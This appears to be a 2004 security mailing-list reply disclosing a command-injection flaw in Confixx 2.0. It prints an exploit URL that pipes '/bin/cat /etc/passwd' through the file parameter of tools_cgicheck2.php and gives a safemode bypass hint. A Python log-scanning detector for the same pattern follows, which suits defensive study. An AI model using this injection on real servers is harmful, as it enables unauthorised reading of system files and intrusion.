Message-ID: <20040310145253.7831.qmail@mail.krefeld.schulen.net>
From: checker at mail.krefeld.schulen.net (checker@...l.krefeld.schulen.net)
Subject: Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW

In the year 2003 I've successfully tested the following exploit on the sw-soft Confixx demo version:

http://confixx-demo.sw-soft.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd

I am sure it still works on many servers.

The PHP safemode is not really a protection against this bug because there are several possibilities to skip safemode (e.g. "date -f /etc/passwd").
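
A defender-side check for the request pattern described in the message above, added here as an example (not part of the original post and not Confixx code): it scans web access log lines for requests to tools_cgicheck2.php whose decoded `dir` or `file` parameter contains shell metacharacters. The log lines are constructed, and the Apache-style log layout, the metacharacter set and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameter names are taken from the post.
TARGET_SCRIPT = "tools_cgicheck2.php"
WATCHED_PARAMS = {"dir", "file"}

# Assumption: characters that can alter a shell command line.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")

# Assumption: Apache common/combined log format request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (name, decoded value) pairs that carry shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + TARGET_SCRIPT):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        if name in WATCHED_PARAMS and SHELL_META.search(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return (line number, client address, hits) for each flagged line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            findings.append((lineno, line.split()[0], hits))
    return findings


# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2004:14:50:01 +0100] "GET /user/tools_cgicheck2.php?dir=cgi-bin&file=test.cgi HTTP/1.0" 200 512',
    '192.0.2.44 - - [10/Mar/2004:14:51:12 +0100] "GET /user/tools_cgicheck2.php?dir=&file=%20./x%20%7Cexample-cmd HTTP/1.0" 200 2048',
    '192.0.2.44 - - [10/Mar/2004:14:51:40 +0100] "GET /user/tools_cgicheck2.php?dir=&file=x%257Cexample-cmd HTTP/1.0" 200 2048',
    '192.0.2.77 - - [10/Mar/2004:14:52:05 +0100] "GET /index.php?file=a%7Cb HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for lineno, client, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} {hits}")
```
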